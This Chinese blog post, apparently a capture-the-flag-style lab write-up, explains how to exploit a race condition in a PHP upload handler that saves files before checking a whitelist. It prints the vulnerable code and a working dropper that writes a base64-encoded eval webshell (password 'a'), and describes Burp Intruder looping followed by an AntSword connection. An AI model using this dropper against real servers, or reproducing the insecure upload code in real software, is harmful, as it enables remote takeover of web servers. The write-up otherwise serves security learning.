文件上传之条件竞争

文件上传-条件竞争

作者:Mi2ac1e

培训:https://tysec.top/?p=792

一直以来都知道文件上传中有一个绕过方法是条件竞争,但没有实际试验过。于是在今天实验的过程中发现了一些问题,写这篇文章记录一下。

0x01 代码分析

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

if(move_uploaded_file($temp_file, $upload_file)){
    if(in_array($file_ext,$ext_arr)){
         $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
         rename($upload_file, $img_path);
         $is_upload = true;
    }else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
        unlink($upload_file);
    }
}else{
    $msg = '上传出错!';
}

}

代码分析:先将文件上传到服务器中,再判断文件后缀是否在白名单里面。如果在则重命名,否则删除。

明显缺陷在于:先将文件上传到服务器中并且该操作没有重命名我们上传的文件。这就可以让我们有了可乘之机:只要知道我们将文件上传到了哪,就可以设置burp一直上传、一直访问。

0x02 漏洞利用

为了万无一失,我并没有将上传的php直接写成一句话木马,而是访问这个文件即可生成一个webshell

需要上传的php代码:

<?php
$a='PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+';
$myfile = fopen("shell.php", "w");
fwrite($myfile, base64_decode($a));
fclose($myfile);
?>

这里需要写入的内容使用了base64加密,原因是如果你直接将$a=一句话木马,生成的文件中将不会含有$_POST['xxx'] 所以我们需要使用base64加密

我把这个文件命名为tjjz.php

上传文件的Burp-intruder:

文件上传之条件竞争
文件上传之条件竞争

尽管你后面使用Null payload,但仍然需要设定一个变量。而且这个变量最好是空格作为变量。否则他的请求包会变成这样:
文件上传之条件竞争

(随便设置变量并选择Null payloads的下场,他会将变量变成空)

文件上传之条件竞争

访问地址的Burp-intruder:

文件上传之条件竞争
文件上传之条件竞争

0x03结果呈现

文件上传之条件竞争
文件上传之条件竞争

蚁剑连接生成的shell.php 密码 a

文件上传之条件竞争

文件上传之条件竞争

上一篇:如何不改表结构动态扩展字段?


下一篇:windows下安装cocoApi和CrowdPoseApi